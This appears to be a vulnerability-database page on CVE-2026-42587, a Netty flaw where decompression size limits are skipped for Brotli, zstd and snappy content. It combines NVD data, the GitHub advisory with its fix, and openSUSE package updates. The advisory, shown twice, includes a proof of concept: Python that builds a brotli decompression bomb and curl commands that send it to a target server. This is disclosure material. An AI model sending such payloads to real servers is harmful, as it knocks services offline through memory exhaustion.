26.1.4-r1, 26.4.11-r0, 26.4.11-r2",
"upstream": [
"CVE-2025-59250",
"CVE-2026-1002",
"CVE-2026-33870",
"CVE-2026-33871",
"CVE-2026-39852",
"CVE-2026-41417",
"CVE-2026-42198",
"CVE-2026-42577",
"CVE-2026-42578",
"CVE-2026-42579",
"CVE-2026-42580",
"CVE-2026-42581",
"CVE-2026-42583",
"CVE-2026-42584",
"CVE-2026-42585",
"CVE-2026-42587",
"CVE-2026-5588",
"CVE-2026-5598",
"ghsa-38f8-5428-x5cv",
"ghsa-3p8m-j85q-pgmj",
"ghsa-45p5-v273-3qqr",
"ghsa-45q3-82m4-75jr",
"ghsa-4cx2-fc23-5wg6",
"ghsa-57rv-r2g8-2cj3",
"ghsa-9342-92gg-6v29",
"ghsa-98qh-xjc8-98pq",
"ghsa-c3fc-8qff-9hwx",
"ghsa-cm33-6792-r9fm",
"ghsa-cphf-4846-3xx9",
"ghsa-fghv-69vj-qj49",
"ghsa-h5fg-jpgr-rv9c",
"ghsa-hq9p-pm7w-8p54",
"ghsa-j288-q9x7-2f5v",
"ghsa-m4cv-j2px-7723",
"ghsa-mj4r-2hfc-f8p6",
"ghsa-p93r-85wp-75v3",
"ghsa-pwqr-wmgm-9rr8",
"ghsa-rc95-pcm8-65v9",
"ghsa-rwm7-x88c-3g2p",
"ghsa-v8h7-rr48-vmmv",
"ghsa-w9fj-cfpg-grvv",
"ghsa-wg6q-6289-32hp",
"ghsa-xxqh-mfjm-7mv9"
]
}
FKIE_CVE-2026-42587
Vulnerability from fkie_nvd - Published: 2026-05-13 19:17 - Updated: 2026-07-03 13:177.5 (High) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
| URL | Tags | ||
|---|---|---|---|
| security-advisories@github.com | https://github.com/netty/netty/security/advisories/GHSA-f6hv-jmp6-3vwv | Exploit, Mitigation, Vendor Advisory | |
| 0b0ca135-0b70-47e7-9f44-1890c2a1c46c | https://access.redhat.com/errata/RHSA-2026:23808 | ||
| 0b0ca135-0b70-47e7-9f44-1890c2a1c46c | https://access.redhat.com/errata/RHSA-2026:24502 | ||
| 0b0ca135-0b70-47e7-9f44-1890c2a1c46c | https://access.redhat.com/errata/RHSA-2026:25123 | ||
| 0b0ca135-0b70-47e7-9f44-1890c2a1c46c | https://access.redhat.com/errata/RHSA-2026:28010 | ||
| 0b0ca135-0b70-47e7-9f44-1890c2a1c46c | https://access.redhat.com/errata/RHSA-2026:34608 | ||
| 0b0ca135-0b70-47e7-9f44-1890c2a1c46c | https://access.redhat.com/security/cve/CVE-2026-42587 | ||
| 0b0ca135-0b70-47e7-9f44-1890c2a1c46c | https://bugzilla.redhat.com/show_bug.cgi?id=2477220 | ||
| 134c704f-9b21-4f2e-91b3-4a467353bcc0 | https://github.com/netty/netty/security/advisories/GHSA-f6hv-jmp6-3vwv | Exploit, Mitigation, Vendor Advisory | |
| 0b0ca135-0b70-47e7-9f44-1890c2a1c46c | https://security.access.redhat.com/data/csaf/v2/vex/2026/cve-2026-42587.json |
{
"affected": [
{
"affectedData": [
{
"product": "netty",
"vendor": "netty",
"versions": [
{
"status": "affected",
"version": "\u003e= 4.2.0.Alpha1, \u003c 4.2.13.Final"
},
{
"status": "affected",
"version": "\u003c 4.1.133.Final"
}
]
},
{
"product": "netty-codec-http",
"vendor": "io.netty",
"versions": [
{
"status": "affected",
"version": "\u003e= 4.2.0.Alpha1, \u003c 4.2.13.Final"
},
{
"status": "affected",
"version": "\u003c 4.1.133.Final"
}
]
},
{
"product": "netty-codec-http2",
"vendor": "io.netty",
"versions": [
{
"status": "affected",
"version": "\u003e= 4.2.0.Alpha1, \u003c 4.2.13.Final"
},
{
"status": "affected",
"version": "\u003c 4.1.133.Final"
}
]
}
],
"source": "security-advisories@github.com"
},
{
"affectedData": [
{
"cpes": [
"cpe:/a:redhat:cryostat:4::el9"
],
"defaultStatus": "affected",
"product": "Cryostat 4 on RHEL 9",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:openshift_devspaces:3.28::el9"
],
"defaultStatus": "affected",
"product": "Red Hat OpenShift Dev Spaces 3.28",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:quarkus:3.27::el8"
],
"defaultStatus": "affected",
"product": "Red Hat build of Quarkus 3.27.4",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:quarkus:3.33::el8"
],
"defaultStatus": "affected",
"product": "Red Hat build of Quarkus 3.33.2",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:amq_streams:2.9::el9"
],
"defaultStatus": "affected",
"product": "Streams for Apache Kafka 2.9.4",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:cryostat:4"
],
"defaultStatus": "affected",
"product": "Cryostat 4",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:serverless:1"
],
"defaultStatus": "affected",
"product": "OpenShift Serverless",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:amq_broker:7"
],
"defaultStatus": "affected",
"product": "Red Hat AMQ Broker 7",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:amq_clients:2023"
],
"defaultStatus": "affected",
"product": "Red Hat AMQ Clients",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:camel_spring_boot:4"
],
"defaultStatus": "affected",
"product": "Red Hat build of Apache Camel for Spring Boot 4",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:service_registry:2"
],
"defaultStatus": "affected",
"product": "Red Hat build of Apicurio Registry 2",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:apicurio_registry:3"
],
"defaultStatus": "affected",
"product": "Red Hat build of Apicurio Registry 3",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:debezium:3"
],
"defaultStatus": "affected",
"product": "Red Hat build of Debezium 3",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:build_keycloak:"
],
"defaultStatus": "affected",
"product": "Red Hat Build of Keycloak",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:optaplanner:::el6"
],
"defaultStatus": "affected",
"product": "Red Hat build of OptaPlanner 8",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:jboss_data_grid:8"
],
"defaultStatus": "affected",
"product": "Red Hat Data Grid 8",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:jboss_fuse:7"
],
"defaultStatus": "affected",
"product": "Red Hat Fuse 7",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:jboss_enterprise_application_platform:7"
],
"defaultStatus": "affected",
"product": "Red Hat JBoss Enterprise Application Platform 7",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:jboss_enterprise_application_platform:8"
],
"defaultStatus": "affected",
"product": "Red Hat JBoss Enterprise Application Platform 8",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:jbosseapxp"
],
"defaultStatus": "affected",
"product": "Red Hat JBoss Enterprise Application Platform Expansion Pack",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:openshift_ai"
],
"defaultStatus": "affected",
"product": "Red Hat OpenShift AI (RHOAI)",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:openshift_devspaces:3"
],
"defaultStatus": "affected",
"product": "Red Hat OpenShift Dev Spaces",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:jboss_enterprise_bpms_platform:7"
],
"defaultStatus": "affected",
"product": "Red Hat Process Automation 7",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:red_hat_single_sign_on:7"
],
"defaultStatus": "affected",
"product": "Red Hat Single Sign-On 7",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:amq_streams:2"
],
"defaultStatus": "affected",
"product": "streams for Apache Kafka 2",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:amq_streams:3"
],
"defaultStatus": "affected",
"product": "streams for Apache Kafka 3",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:camel_quarkus:3"
],
"defaultStatus": "unaffected",
"product": "Red Hat build of Apache Camel 4 for Quarkus 3",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:enterprise_linux_ai:3"
],
"defaultStatus": "unaffected",
"product": "Red Hat Enterprise Linux AI (RHEL AI) 3",
"vendor": "Red Hat"
},
{
"cpes": [
"cpe:/a:redhat:satellite:6"
],
"defaultStatus": "unaffected",
"product": "Red Hat Satellite 6",
"vendor": "Red Hat"
}
],
"source": "0b0ca135-0b70-47e7-9f44-1890c2a1c46c"
}
],
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:netty:netty:*:*:*:*:*:*:*:*",
"matchCriteriaId": "DFE205A5-2C43-40C9-A2FF-CF6759B8D861",
"versionEndExcluding": "4.1.133",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:netty:netty:*:*:*:*:*:*:*:*",
"matchCriteriaId": "D94A720F-9CED-4BE9-8C37-FD9E2FD28472",
"versionEndExcluding": "4.2.13",
"versionStartIncluding": "4.2.0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "Netty is an asynchronous, event-driven network application framework. Prior to 4.2.13.Final and 4.1.133.Final, HttpContentDecompressor accepts a maxAllocation parameter to limit decompression buffer size and prevent decompression bomb attacks. This limit is correctly enforced for gzip and deflate encodings via ZlibDecoder, but is silently ignored when the content encoding is br (Brotli), zstd, or snappy. An attacker can bypass the configured decompression limit by sending a compressed payload with Content-Encoding: br instead of Content-Encoding: gzip, causing unbounded memory allocation and out-of-memory denial of service. The same vulnerability exists in DelegatingDecompressorFrameListener for HTTP/2 connections. This vulnerability is fixed in 4.2.13.Final and 4.1.133.Final."
}
],
"id": "CVE-2026-42587",
"lastModified": "2026-07-03T13:17:13.387",
"metrics": {
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "security-advisories@github.com",
"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "0b0ca135-0b70-47e7-9f44-1890c2a1c46c",
"type": "Secondary"
}
],
"ssvcV203": [
{
"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"ssvcData": {
"id": "CVE-2026-42587",
"options": [
{
"exploitation": "poc"
},
{
"automatable": "yes"
},
{
"technicalImpact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2026-05-13T18:43:31.138358Z",
"version": "2.0.3"
}
}
]
},
"published": "2026-05-13T19:17:24.460",
"references": [
{
"source": "security-advisories@github.com",
"tags": [
"Exploit",
"Mitigation",
"Vendor Advisory"
],
"url": "https://github.com/netty/netty/security/advisories/GHSA-f6hv-jmp6-3vwv"
},
{
"source": "0b0ca135-0b70-47e7-9f44-1890c2a1c46c",
"url": "https://access.redhat.com/errata/RHSA-2026:23808"
},
{
"source": "0b0ca135-0b70-47e7-9f44-1890c2a1c46c",
"url": "https://access.redhat.com/errata/RHSA-2026:24502"
},
{
"source": "0b0ca135-0b70-47e7-9f44-1890c2a1c46c",
"url": "https://access.redhat.com/errata/RHSA-2026:25123"
},
{
"source": "0b0ca135-0b70-47e7-9f44-1890c2a1c46c",
"url": "https://access.redhat.com/errata/RHSA-2026:28010"
},
{
"source": "0b0ca135-0b70-47e7-9f44-1890c2a1c46c",
"url": "https://access.redhat.com/errata/RHSA-2026:34608"
},
{
"source": "0b0ca135-0b70-47e7-9f44-1890c2a1c46c",
"url": "https://access.redhat.com/security/cve/CVE-2026-42587"
},
{
"source": "0b0ca135-0b70-47e7-9f44-1890c2a1c46c",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2477220"
},
{
"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"tags": [
"Exploit",
"Mitigation",
"Vendor Advisory"
],
"url": "https://github.com/netty/netty/security/advisories/GHSA-f6hv-jmp6-3vwv"
},
{
"source": "0b0ca135-0b70-47e7-9f44-1890c2a1c46c",
"url": "https://security.access.redhat.com/data/csaf/v2/vex/2026/cve-2026-42587.json"
}
],
"sourceIdentifier": "security-advisories@github.com",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-400"
}
],
"source": "security-advisories@github.com",
"type": "Secondary"
},
{
"description": [
{
"lang": "en",
"value": "CWE-770"
}
],
"source": "0b0ca135-0b70-47e7-9f44-1890c2a1c46c",
"type": "Secondary"
}
]
}
GHSA-F6HV-JMP6-3VWV
Vulnerability from github – Published: 2026-05-07 00:46 – Updated: 2026-05-14 20:41Summary
HttpContentDecompressor accepts a maxAllocation parameter to limit decompression buffer size and prevent decompression bomb attacks. This limit is correctly enforced for gzip and deflate encodings via ZlibDecoder, but is silently ignored when the content encoding is br (Brotli), zstd, or snappy. An attacker can bypass the configured decompression limit by sending a compressed payload with Content-Encoding: br instead of Content-Encoding: gzip, causing unbounded memory allocation and out-of-memory denial of service.
The same vulnerability exists in DelegatingDecompressorFrameListener for HTTP/2 connections.
Details
HttpContentDecompressor stores the maxAllocation value at construction time (HttpContentDecompressor.java:89) and uses it in newContentDecoder() to create the appropriate decompression handler.
For gzip/deflate, maxAllocation is forwarded to ZlibCodecFactory.newZlibDecoder():
// HttpContentDecompressor.java:101 — maxAllocation IS enforced
.handlers(ZlibCodecFactory.newZlibDecoder(ZlibWrapper.GZIP, maxAllocation))
ZlibDecoder.prepareDecompressBuffer() enforces this as a hard cap by setting the buffer's maxCapacity and throwing DecompressionException when the limit is reached:
// ZlibDecoder.java:68 — hard limit on buffer capacity
return ctx.alloc().heapBuffer(Math.min(preferredSize, maxAllocation), maxAllocation);
// ZlibDecoder.java:80 — throws when exceeded
throw new DecompressionException("Decompression buffer has reached maximum size: " + buffer.maxCapacity());
For brotli, zstd, and snappy, the decoders are created without any size limit:
// HttpContentDecompressor.java:120 — maxAllocation IGNORED
.handlers(new BrotliDecoder())
// HttpContentDecompressor.java:129 — maxAllocation IGNORED
.handlers(new SnappyFrameDecoder())
// HttpContentDecompressor.java:138 — maxAllocation IGNORED
.handlers(new ZstdDecoder())
BrotliDecoder has no maxAllocation parameter at all — there is no way to constrain its output. It streams decompressed data in chunks via fireChannelRead with no total limit.
ZstdDecoder() defaults to a 4MB maximumAllocationSize, but this only constrains individual buffer allocations, not total output. The decode loop (ZstdDecoder.java:100-114) creates new buffers and fires channelRead repeatedly, so total decompressed output is unbounded.
The identical pattern exists in DelegatingDecompressorFrameListener.newContentDecompressor() at lines 188-210 for HTTP/2.
PoC
- Configure a Netty HTTP server with decompression bomb protection:
pipeline.addLast(new HttpContentDecompressor(1048576)); // 1MB max
pipeline.addLast(new HttpObjectAggregator(1048576)); // 1MB max
- Generate a brotli-compressed bomb (~1KB compressed → 1GB decompressed):
import brotli
bomb = b'\x00' * (1024 * 1024 * 1024) # 1GB of zeros
compressed = brotli.compress(bomb, quality=11)
with open('bomb.br', 'wb') as f:
f.write(compressed)
# compressed size: ~1KB
- Send the bomb with gzip encoding (BLOCKED by maxAllocation):
# This is caught — ZlibDecoder enforces the 1MB limit
curl -X POST http://target:8080/api \
-H 'Content-Encoding: gzip' \
--data-binary @bomb.gz
# Result: DecompressionException thrown at 1MB
- Send the same bomb with brotli encoding (BYPASSES maxAllocation):
# This bypasses the limit — BrotliDecoder has no maxAllocation
curl -X POST http://target:8080/api \
-H 'Content-Encoding: br' \
--data-binary @bomb.br
# Result: Full 1GB decompressed into memory → OOM
- The same bypass works with
Content-Encoding: zstdandContent-Encoding: snappy.
Impact
- Denial of Service: An attacker can cause out-of-memory conditions on any Netty server that relies on
maxAllocationfor decompression bomb protection, by simply using a non-gzip content encoding. - False sense of security: Developers who explicitly configure
maxAllocationto protect against decompression bombs are not actually protected for brotli, zstd, or snappy encodings. The API documentation implies all encodings are covered. - Trivial bypass: The attacker only needs to change one HTTP header (
Content-Encoding: brinstead ofContent-Encoding: gzip) to circumvent the protection entirely. - Both HTTP/1.1 and HTTP/2: The vulnerability exists in both
HttpContentDecompressor(HTTP/1.1) andDelegatingDecompressorFrameListener(HTTP/2).
Recommended Fix
Pass maxAllocation to all decoder constructors. For BrotliDecoder, which currently has no maxAllocation support, add the parameter:
HttpContentDecompressor.java — pass maxAllocation to all decoders:
// Line 120: BrotliDecoder — add maxAllocation support
.handlers(new BrotliDecoder(maxAllocation))
// Line 129: SnappyFrameDecoder — add maxAllocation support
.handlers(new SnappyFrameDecoder(maxAllocation))
// Line 138: ZstdDecoder — forward the configured maxAllocation
.handlers(new ZstdDecoder(maxAllocation))
DelegatingDecompressorFrameListener.java — same fix at lines 188-210.
BrotliDecoder — add maxAllocation parameter with the same semantics as ZlibDecoder.prepareDecompressBuffer(): set buffer maxCapacity and throw DecompressionException when the total decompressed output exceeds the limit.
SnappyFrameDecoder — add maxAllocation parameter with equivalent enforcement.
ZstdDecoder — ensure that when maxAllocation is set, total output across all buffers is bounded (not just per-buffer allocation size).
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 4.2.12.Final"
},
"package": {
"ecosystem": "Maven",
"name": "io.netty:netty-codec-http"
},
"ranges": [
{
"events": [
{
"introduced": "4.2.0.Alpha1"
},
{
"fixed": "4.2.13.Final"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 4.2.12.Final"
},
"package": {
"ecosystem": "Maven",
"name": "io.netty:netty-codec-http2"
},
"ranges": [
{
"events": [
{
"introduced": "4.2.0.Alpha1"
},
{
"fixed": "4.2.13.Final"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 4.1.132.Final"
},
"package": {
"ecosystem": "Maven",
"name": "io.netty:netty-codec-http"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "4.1.133.Final"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 4.1.132.Final"
},
"package": {
"ecosystem": "Maven",
"name": "io.netty:netty-codec-http2"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "4.1.133.Final"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-42587"
],
"database_specific": {
"cwe_ids": [
"CWE-400"
],
"github_reviewed": true,
"github_reviewed_at": "2026-05-07T00:46:35Z",
"nvd_published_at": "2026-05-13T19:17:24Z",
"severity": "HIGH"
},
"details": "## Summary\n\n`HttpContentDecompressor` accepts a `maxAllocation` parameter to limit decompression buffer size and prevent decompression bomb attacks. This limit is correctly enforced for gzip and deflate encodings via `ZlibDecoder`, but is silently ignored when the content encoding is `br` (Brotli), `zstd`, or `snappy`. An attacker can bypass the configured decompression limit by sending a compressed payload with `Content-Encoding: br` instead of `Content-Encoding: gzip`, causing unbounded memory allocation and out-of-memory denial of service.\n\nThe same vulnerability exists in `DelegatingDecompressorFrameListener` for HTTP/2 connections.\n\n## Details\n\n`HttpContentDecompressor` stores the `maxAllocation` value at construction time (`HttpContentDecompressor.java:89`) and uses it in `newContentDecoder()` to create the appropriate decompression handler.\n\nFor gzip/deflate, `maxAllocation` is forwarded to `ZlibCodecFactory.newZlibDecoder()`:\n\n```java\n// HttpContentDecompressor.java:101 \u2014 maxAllocation IS enforced\n.handlers(ZlibCodecFactory.newZlibDecoder(ZlibWrapper.GZIP, maxAllocation))\n```\n\n`ZlibDecoder.prepareDecompressBuffer()` enforces this as a hard cap by setting the buffer\u0027s `maxCapacity` and throwing `DecompressionException` when the limit is reached:\n\n```java\n// ZlibDecoder.java:68 \u2014 hard limit on buffer capacity\nreturn ctx.alloc().heapBuffer(Math.min(preferredSize, maxAllocation), maxAllocation);\n// ZlibDecoder.java:80 \u2014 throws when exceeded\nthrow new DecompressionException(\"Decompression buffer has reached maximum size: \" + buffer.maxCapacity());\n```\n\nFor brotli, zstd, and snappy, the decoders are created without any size limit:\n\n```java\n// HttpContentDecompressor.java:120 \u2014 maxAllocation IGNORED\n.handlers(new BrotliDecoder())\n\n// HttpContentDecompressor.java:129 \u2014 maxAllocation IGNORED\n.handlers(new SnappyFrameDecoder())\n\n// HttpContentDecompressor.java:138 \u2014 maxAllocation IGNORED\n.handlers(new ZstdDecoder())\n```\n\n`BrotliDecoder` has no `maxAllocation` parameter at all \u2014 there is no way to constrain its output. It streams decompressed data in chunks via `fireChannelRead` with no total limit.\n\n`ZstdDecoder()` defaults to a 4MB `maximumAllocationSize`, but this only constrains individual buffer allocations, not total output. The decode loop (`ZstdDecoder.java:100-114`) creates new buffers and fires `channelRead` repeatedly, so total decompressed output is unbounded.\n\nThe identical pattern exists in `DelegatingDecompressorFrameListener.newContentDecompressor()` at lines 188-210 for HTTP/2.\n\n## PoC\n\n1. Configure a Netty HTTP server with decompression bomb protection:\n\n```java\npipeline.addLast(new HttpContentDecompressor(1048576)); // 1MB max\npipeline.addLast(new HttpObjectAggregator(1048576)); // 1MB max\n```\n\n2. Generate a brotli-compressed bomb (~1KB compressed \u2192 1GB decompressed):\n\n```python\nimport brotli\nbomb = b\u0027\\x00\u0027 * (1024 * 1024 * 1024) # 1GB of zeros\ncompressed = brotli.compress(bomb, quality=11)\nwith open(\u0027bomb.br\u0027, \u0027wb\u0027) as f:\n f.write(compressed)\n# compressed size: ~1KB\n```\n\n3. Send the bomb with gzip encoding (BLOCKED by maxAllocation):\n\n```bash\n# This is caught \u2014 ZlibDecoder enforces the 1MB limit\ncurl -X POST http://target:8080/api \\\n -H \u0027Content-Encoding: gzip\u0027 \\\n --data-binary @bomb.gz\n# Result: DecompressionException thrown at 1MB\n```\n\n4. Send the same bomb with brotli encoding (BYPASSES maxAllocation):\n\n```bash\n# This bypasses the limit \u2014 BrotliDecoder has no maxAllocation\ncurl -X POST http://target:8080/api \\\n -H \u0027Content-Encoding: br\u0027 \\\n --data-binary @bomb.br\n# Result: Full 1GB decompressed into memory \u2192 OOM\n```\n\n5. The same bypass works with `Content-Encoding: zstd` and `Content-Encoding: snappy`.\n\n## Impact\n\n- **Denial of Service**: An attacker can cause out-of-memory conditions on any Netty server that relies on `maxAllocation` for decompression bomb protection, by simply using a non-gzip content encoding.\n- **False sense of security**: Developers who explicitly configure `maxAllocation` to protect against decompression bombs are not actually protected for brotli, zstd, or snappy encodings. The API documentation implies all encodings are covered.\n- **Trivial bypass**: The attacker only needs to change one HTTP header (`Content-Encoding: br` instead of `Content-Encoding: gzip`) to circumvent the protection entirely.\n- **Both HTTP/1.1 and HTTP/2**: The vulnerability exists in both `HttpContentDecompressor` (HTTP/1.1) and `DelegatingDecompressorFrameListener` (HTTP/2).\n\n## Recommended Fix\n\nPass `maxAllocation` to all decoder constructors. For `BrotliDecoder`, which currently has no `maxAllocation` support, add the parameter:\n\n**HttpContentDecompressor.java** \u2014 pass maxAllocation to all decoders:\n\n```java\n// Line 120: BrotliDecoder \u2014 add maxAllocation support\n.handlers(new BrotliDecoder(maxAllocation))\n\n// Line 129: SnappyFrameDecoder \u2014 add maxAllocation support\n.handlers(new SnappyFrameDecoder(maxAllocation))\n\n// Line 138: ZstdDecoder \u2014 forward the configured maxAllocation\n.handlers(new ZstdDecoder(maxAllocation))\n```\n\n**DelegatingDecompressorFrameListener.java** \u2014 same fix at lines 188-210.\n\n**BrotliDecoder** \u2014 add `maxAllocation` parameter with the same semantics as `ZlibDecoder.prepareDecompressBuffer()`: set buffer maxCapacity and throw `DecompressionException` when the total decompressed output exceeds the limit.\n\n**SnappyFrameDecoder** \u2014 add `maxAllocation` parameter with equivalent enforcement.\n\n**ZstdDecoder** \u2014 ensure that when `maxAllocation` is set, total output across all buffers is bounded (not just per-buffer allocation size).",
"id": "GHSA-f6hv-jmp6-3vwv",
"modified": "2026-05-14T20:41:29Z",
"published": "2026-05-07T00:46:35Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/netty/netty/security/advisories/GHSA-f6hv-jmp6-3vwv"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42587"
},
{
"type": "PACKAGE",
"url": "https://github.com/netty/netty"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
}
],
"summary": "Netty: HttpContentDecompressor maxAllocation bypass when Content-Encoding set to br/zstd/snappy leads to decompression bomb DoS"
}
OPENSUSE-SU-2026:10795-1
Vulnerability from csaf_opensuse - Published: 2026-05-16 00:00 - Updated: 2026-05-16 00:00| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: openSUSE Tumbleweed:netty-4.1.133-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-4.1.133-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-4.1.133-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-4.1.133-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-bom-4.1.133-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-bom-4.1.133-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-bom-4.1.133-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-bom-4.1.133-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-parent-4.1.133-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-parent-4.1.133-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-parent-4.1.133-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-parent-4.1.133-1.1.x86_64 | — |
Vendor Fix
|
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: openSUSE Tumbleweed:netty-4.1.133-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-4.1.133-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-4.1.133-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-4.1.133-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-bom-4.1.133-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-bom-4.1.133-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-bom-4.1.133-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-bom-4.1.133-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-parent-4.1.133-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-parent-4.1.133-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-parent-4.1.133-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-parent-4.1.133-1.1.x86_64 | — |
Vendor Fix
|
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: openSUSE Tumbleweed:netty-4.1.133-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-4.1.133-1.1.ppc64le | — |
Vendor Fix
|
|
